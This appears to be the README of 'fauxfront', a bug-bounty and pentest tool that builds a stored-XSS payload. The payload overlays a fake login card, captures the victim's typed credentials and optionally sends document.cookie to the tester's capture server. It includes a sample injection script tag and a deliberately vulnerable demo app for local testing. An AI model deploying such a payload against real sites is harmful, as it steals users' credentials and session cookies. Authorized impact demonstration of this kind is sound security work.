Stop doing alert(1) for your XSS proof-of-concepts. A bare alert might be trivially dismissed by triagers ("cool, you can log a 1, so what?"). A pseudo-legitimate fake looking login overlay with captured credentials landing in your terminal might get more attention, and is a better PoC.
fauxfront generates a small JS payload and runs a hardened capture server so you can demonstrate a legitimate attack scenario of a stored XSS in bug-bounty and pentest writeups.
- Drops a pseudo-legitimate login card onto the vulnerable page
- Captures whatever the victim types to your server
- Optionally exfiltrates
document.cookieon load - Cookie-busts itself so the overlay only fires once per victim
- Closes itself cleanly so nothing looks broken afterwards
- Logs captures as compact, screenshot-friendly plaintext
This is for impact demonstration after you've already proven XSS, with authorization to test. Don't point it at users or systems you haven't been invited to poke.
make # both binaries
make build # just fauxfront
make demo-app # just the intentionally-vulnerable test app
make linux-amd64 # cross-compile; also darwin-arm64, windows-amd64, ...
make release # every platform in PLATFORMS
Binaries land in dist/, named <bin>-<os>-<arch>[.exe].
$ sudo ./fauxfront-darwin-arm64 \
-addr :80 \
-plain-http \
-title "Sign In" \
-grab-cookies \
-attempts 1
listening http://localhost:80
capture http://localhost:80/c/f7c5d924028cb24a0540ef7fe132d6a01c9c66ed93e9e7ec
payload http://localhost:80/e051.js
injection <script src="http://localhost:80/e051.js"></script>
When a victim hits the page:
Screenshot. Paste into your report. Done.
| flag | default | notes |
|---|---|---|
-attempts N |
2 |
submissions before the overlay closes (1 = one-shot) |
-title STR |
"Sign in" |
overlay title |
-color HEX |
1a73e8 |
primary button color, no # |
-logo PATH |
- | image embedded as a data: URL in the card |
-grab-cookies |
off | also exfil document.cookie |
-payload-path STR |
random /<4-hex>.js |
e.g. a.js if you want something specific |
-addr ADDR |
:443 |
listen address |
-plain-http |
off | skip TLS (LAN / homelab only) |
-cert / -key |
- | LE or other real cert+key PEMs |
-hosts CSV |
localhost,127.0.0.1 |
SANs for the auto self-signed cert |
-log FILE |
stderr only | also mirror captures to a file |
fauxfront-demo is a deliberately vulnerable guestbook for testing the whole flow locally without touching a real target. It stores comments as raw HTML and sets a few dummy cookies on load (including one HttpOnly) so you can verify credential and cookie exfiltration end-to-end.
./dist/fauxfront-demo-linux-amd64 -plain-http
Browse to http://localhost:8443/, paste the injection snippet as a comment, and see it fire.
- Random per-run token in the capture URL path; unknown paths return 404 with no hint the endpoint exists
- Random per-run payload path (configurable)
- 4 KB body cap,
Content-Type: application/jsonrequired, JSON-only bodies - TLS 1.2 minimum; auto self-signed cert if you don't pass one
- Loose global rate-limit ceiling that legitimate victim flows never trip (exists as a DoS safety net)
- No arbitrary file serving, no directory listing, no information disclosure from
/
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for more details.
